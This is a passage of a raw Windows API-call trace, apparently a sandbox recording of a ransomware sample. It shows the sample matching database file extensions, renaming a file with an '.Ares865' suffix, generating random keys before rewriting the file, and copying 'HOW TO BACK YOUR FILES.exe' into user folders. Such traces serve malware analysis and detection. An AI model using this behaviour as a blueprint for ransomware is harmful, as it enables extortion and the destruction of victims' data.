lpString2="fp3") returned 1 [0060.040] lstrlenW (lpString="fp4") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="fp4") returned 1 [0060.040] lstrlenW (lpString="fp5") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="fp5") returned 1 [0060.040] lstrlenW (lpString="fp7") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="fp7") returned 1 [0060.040] lstrlenW (lpString="fpt") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="fpt") returned 1 [0060.040] lstrlenW (lpString="frm") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="frm") returned 1 [0060.040] lstrlenW (lpString="gdb") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0060.040] lstrlenW (lpString="gdb") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="gdb") returned 1 [0060.040] lstrlenW (lpString="grdb") returned 4 [0060.040] lstrcmpiW (lpString1="s-ms", lpString2="grdb") returned 1 [0060.040] lstrlenW (lpString="gwi") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="gwi") returned 1 [0060.040] lstrlenW (lpString="hdb") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="hdb") returned 1 [0060.040] lstrlenW (lpString="his") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="his") returned 1 [0060.040] lstrlenW (lpString="ib") returned 2 [0060.040] lstrcmpiW (lpString1="ms", lpString2="ib") returned 1 [0060.040] lstrlenW (lpString="idb") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="idb") returned 1 [0060.040] lstrlenW (lpString="ihx") returned 3 [0060.040] lstrcmpiW (lpString1="-ms", lpString2="ihx") returned 1 [0060.041] lstrlenW (lpString="itdb") returned 4 [0060.041] lstrcmpiW (lpString1="s-ms", lpString2="itdb") returned 1 [0060.041] lstrlenW (lpString="itw") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="itw") returned 1 [0060.041] lstrlenW (lpString="jet") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="jet") returned 1 [0060.041] lstrlenW (lpString="jtx") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="jtx") returned 1 [0060.041] lstrlenW (lpString="kdb") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="kdb") returned 1 [0060.041] lstrlenW (lpString="kexi") returned 4 [0060.041] lstrcmpiW (lpString1="s-ms", lpString2="kexi") returned 1 [0060.041] lstrlenW (lpString="kexic") returned 5 [0060.041] lstrcmpiW (lpString1="ns-ms", lpString2="kexic") returned 1 [0060.041] lstrlenW (lpString="kexis") returned 5 [0060.041] lstrcmpiW (lpString1="ns-ms", lpString2="kexis") returned 1 [0060.041] lstrlenW (lpString="lgc") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="lgc") returned 1 [0060.041] lstrlenW (lpString="lwx") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="lwx") returned 1 [0060.041] lstrlenW (lpString="maf") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="maf") returned 1 [0060.041] lstrlenW (lpString="maq") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="maq") returned 1 [0060.041] lstrlenW (lpString="mar") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="mar") returned 1 [0060.041] lstrlenW (lpString="marshal") returned 7 [0060.041] lstrcmpiW (lpString1="ions-ms", lpString2="marshal") returned -1 [0060.041] lstrlenW (lpString="mas") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="mas") returned 1 [0060.041] lstrlenW (lpString="mav") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="mav") returned 1 [0060.041] lstrlenW (lpString="maw") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="maw") returned 1 [0060.041] lstrlenW (lpString="mdbhtml") returned 7 [0060.041] lstrcmpiW (lpString1="ions-ms", lpString2="mdbhtml") returned -1 [0060.041] lstrlenW (lpString="mdn") returned 3 [0060.041] lstrcmpiW (lpString1="-ms", lpString2="mdn") returned 1 [0060.042] lstrlenW (lpString="mdt") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="mdt") returned 1 [0060.042] lstrlenW (lpString="mfd") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="mfd") returned 1 [0060.042] lstrlenW (lpString="mpd") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="mpd") returned 1 [0060.042] lstrlenW (lpString="mrg") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="mrg") returned 1 [0060.042] lstrlenW (lpString="mud") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="mud") returned -1 [0060.042] lstrlenW (lpString="mwb") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="mwb") returned -1 [0060.042] lstrlenW (lpString="myd") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="myd") returned -1 [0060.042] lstrlenW (lpString="ndf") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="ndf") returned -1 [0060.042] lstrlenW (lpString="nnt") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="nnt") returned -1 [0060.042] lstrlenW (lpString="nrmlib") returned 6 [0060.042] lstrcmpiW (lpString1="ons-ms", lpString2="nrmlib") returned 1 [0060.042] lstrlenW (lpString="ns2") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="ns2") returned -1 [0060.042] lstrlenW (lpString="ns3") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="ns3") returned -1 [0060.042] lstrlenW (lpString="ns4") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="ns4") returned -1 [0060.042] lstrlenW (lpString="nsf") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="nsf") returned -1 [0060.042] lstrlenW (lpString="nv") returned 2 [0060.042] lstrcmpiW (lpString1="ms", lpString2="nv") returned -1 [0060.042] lstrlenW (lpString="nv2") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="nv2") returned -1 [0060.042] lstrlenW (lpString="nwdb") returned 4 [0060.042] lstrcmpiW (lpString1="s-ms", lpString2="nwdb") returned 1 [0060.042] lstrlenW (lpString="nyf") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="nyf") returned -1 [0060.042] lstrlenW (lpString="odb") returned 3 [0060.042] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0060.043] lstrlenW (lpString="odb") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="odb") returned -1 [0060.043] lstrlenW (lpString="oqy") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="oqy") returned -1 [0060.043] lstrlenW (lpString="ora") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="ora") returned -1 [0060.043] lstrlenW (lpString="orx") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="orx") returned -1 [0060.043] lstrlenW (lpString="owc") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="owc") returned -1 [0060.043] lstrlenW (lpString="p96") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="p96") returned -1 [0060.043] lstrlenW (lpString="p97") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="p97") returned -1 [0060.043] lstrlenW (lpString="pan") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="pan") returned -1 [0060.043] lstrlenW (lpString="pdb") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="pdb") returned -1 [0060.043] lstrlenW (lpString="pdm") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="pdm") returned -1 [0060.043] lstrlenW (lpString="pnz") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="pnz") returned -1 [0060.043] lstrlenW (lpString="qry") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="qry") returned -1 [0060.043] lstrlenW (lpString="qvd") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="qvd") returned -1 [0060.043] lstrlenW (lpString="rbf") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="rbf") returned -1 [0060.043] lstrlenW (lpString="rctd") returned 4 [0060.043] lstrcmpiW (lpString1="s-ms", lpString2="rctd") returned 1 [0060.043] lstrlenW (lpString="rod") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="rod") returned -1 [0060.043] lstrlenW (lpString="rodx") returned 4 [0060.043] lstrcmpiW (lpString1="s-ms", lpString2="rodx") returned 1 [0060.043] lstrlenW (lpString="rpd") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="rpd") returned -1 [0060.043] lstrlenW (lpString="rsd") returned 3 [0060.043] lstrcmpiW (lpString1="-ms", lpString2="rsd") returned -1 [0060.044] lstrlenW (lpString="sas7bdat") returned 8 [0060.044] lstrcmpiW (lpString1="tions-ms", lpString2="sas7bdat") returned 1 [0060.044] lstrlenW (lpString="sbf") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="sbf") returned -1 [0060.044] lstrlenW (lpString="scx") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="scx") returned -1 [0060.044] lstrlenW (lpString="sdb") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="sdb") returned -1 [0060.044] lstrlenW (lpString="sdc") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="sdc") returned -1 [0060.044] lstrlenW (lpString="sdf") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="sdf") returned -1 [0060.044] lstrlenW (lpString="sis") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="sis") returned -1 [0060.044] lstrlenW (lpString="spq") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="spq") returned -1 [0060.044] lstrlenW (lpString="te") returned 2 [0060.044] lstrcmpiW (lpString1="ms", lpString2="te") returned -1 [0060.044] lstrlenW (lpString="teacher") returned 7 [0060.044] lstrcmpiW (lpString1="ions-ms", lpString2="teacher") returned -1 [0060.044] lstrlenW (lpString="tmd") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="tmd") returned -1 [0060.044] lstrlenW (lpString="tps") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="tps") returned -1 [0060.044] lstrlenW (lpString="trc") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0060.044] lstrlenW (lpString="trc") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="trc") returned -1 [0060.044] lstrlenW (lpString="trm") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="trm") returned -1 [0060.044] lstrlenW (lpString="udb") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="udb") returned -1 [0060.044] lstrlenW (lpString="udl") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="udl") returned -1 [0060.044] lstrlenW (lpString="usr") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="usr") returned -1 [0060.044] lstrlenW (lpString="v12") returned 3 [0060.044] lstrcmpiW (lpString1="-ms", lpString2="v12") returned -1 [0060.045] lstrlenW (lpString="vis") returned 3 [0060.045] lstrcmpiW (lpString1="-ms", lpString2="vis") returned -1 [0060.045] lstrlenW (lpString="vpd") returned 3 [0060.045] lstrcmpiW (lpString1="-ms", lpString2="vpd") returned -1 [0060.045] lstrlenW (lpString="vvv") returned 3 [0060.045] lstrcmpiW (lpString1="-ms", lpString2="vvv") returned -1 [0060.045] lstrlenW (lpString="wdb") returned 3 [0060.045] lstrcmpiW (lpString1="-ms", lpString2="wdb") returned -1 [0060.045] lstrlenW (lpString="wmdb") returned 4 [0060.045] lstrcmpiW (lpString1="s-ms", lpString2="wmdb") returned -1 [0060.045] lstrlenW (lpString="wrk") returned 3 [0060.045] lstrcmpiW (lpString1="-ms", lpString2="wrk") returned -1 [0060.045] lstrlenW (lpString="xdb") returned 3 [0060.045] lstrcmpiW (lpString1="-ms", lpString2="xdb") returned -1 [0060.045] lstrlenW (lpString="xld") returned 3 [0060.045] lstrcmpiW (lpString1="-ms", lpString2="xld") returned -1 [0060.045] lstrlenW (lpString="xmlff") returned 5 [0060.045] lstrcmpiW (lpString1="ns-ms", lpString2="xmlff") returned -1 [0060.045] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.Ares865") returned 100 [0060.045] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms" (normalized: "c:\\users\\default user\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms"), lpNewFileName="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.Ares865" (normalized: "c:\\users\\default user\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.ares865"), dwFlags=0x1) returned 1 [0060.052] CreateFileW (lpFileName="C:\\Users\\Default User\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.Ares865" (normalized: "c:\\users\\default user\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0060.052] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5632) returned 1 [0060.052] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0060.052] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0060.052] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0060.052] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2effc8) returned 1 [0060.053] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0060.053] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.053] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1900, lpName=0x0) returned 0x164 [0060.055] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1900) returned 0x190000 [0060.057] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0060.057] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0060.057] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.057] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0060.057] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0060.057] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.057] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.057] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.058] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.058] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.058] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0060.058] CloseHandle (hObject=0x164) returned 1 [0060.058] CloseHandle (hObject=0x15c) returned 1 [0060.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0060.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0060.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3240020 | out: hHeap=0x2b0000) returned 1 [0060.060] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ec8e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.060] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.060] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ec8e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.060] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.060] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2268 [0060.060] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\PrintHood", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\PrintHood") returned="C:\\Users\\Default User\\PrintHood" [0060.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6438 | out: hHeap=0x2b0000) returned 1 [0060.060] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2260 | out: hHeap=0x2b0000) returned 1 [0060.060] lstrlenW (lpString="C:\\Users\\Default User\\PrintHood") returned 31 [0060.060] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\PrintHood" | out: lpString1="C:\\Users\\Default User\\PrintHood") returned="C:\\Users\\Default User\\PrintHood" [0060.060] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.060] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\PrintHood\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\printhood\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.061] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.061] GetLastError () returned 0x0 [0060.061] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.061] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.061] CloseHandle (hObject=0x12c) returned 1 [0060.061] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.061] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.061] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\PrintHood\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0060.062] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.062] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.062] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.062] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.062] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.062] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.062] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.062] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.062] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49ec8e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0060.062] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0060.062] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x49ec8e00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0060.062] FindClose (in: hFindFile=0x2ccda8 | out: hFindFile=0x2ccda8) returned 1 [0060.062] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2248 [0060.062] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Pictures", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Pictures") returned="C:\\Users\\Default User\\Pictures" [0060.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e5fb8 | out: hHeap=0x2b0000) returned 1 [0060.063] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2240 | out: hHeap=0x2b0000) returned 1 [0060.063] lstrlenW (lpString="C:\\Users\\Default User\\Pictures") returned 30 [0060.063] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Pictures" | out: lpString1="C:\\Users\\Default User\\Pictures") returned="C:\\Users\\Default User\\Pictures" [0060.063] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0060.063] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Pictures\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\pictures\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.063] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.063] GetLastError () returned 0x0 [0060.063] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.063] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.063] CloseHandle (hObject=0x12c) returned 1 [0060.064] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.064] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.064] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Pictures\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0060.064] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.064] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.064] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.064] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49ec8e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49ec8e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.064] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.064] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.064] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.064] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.064] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, 